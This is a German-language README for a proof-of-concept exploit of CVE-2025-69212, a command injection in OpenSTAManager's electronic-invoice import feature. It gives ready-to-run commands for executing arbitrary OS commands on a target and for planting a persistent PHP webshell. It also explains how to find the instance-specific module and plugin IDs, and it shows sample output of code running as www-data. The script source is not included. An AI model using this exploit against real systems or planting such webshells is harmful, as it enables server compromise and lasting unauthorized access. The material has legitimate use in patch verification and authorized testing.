
CVE-2025-69212 - OpenSTAManager OS-Befehlseinschleusung PoC
Abhängigkeiten installieren:
pip install -r requirements.txt
Einzelnen Befehl ausführen und dessen Ausgabe anzeigen:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
Stattdessen eine persistente PHP-Webshell ablegen:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
| Flag | Beschreibung |
|---|
-u, --url | Basis-URL der Zielinstanz |
-U, --username | Benutzername für die Authentifizierung |
-P, --password | Passwort für die Authentifizierung |
-c, --command | Auszuführender Befehl, Ausgabe wird in pwn_out.txt gespeichert |
--shell | Statt eines einzelnen Befehls eine PHP-Webshell unter files/shell.php ablegen |
--id-module | Modul-ID für die Rechnungsimportfunktion (Standard: 14) |
--id-plugin | Plugin-ID für die Rechnungsimportfunktion (Standard: 48) |
id_module und id_plugin sind instanzspezifisch. Wenn die Standardwerte nicht funktionieren, melden Sie sich in der Web-Oberfläche des Ziels an, navigieren Sie zur Funktion zum Importieren elektronischer Rechnungen und überprüfen Sie die Request-Parameter im Netzwerk-Tab Ihres Browsers.
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------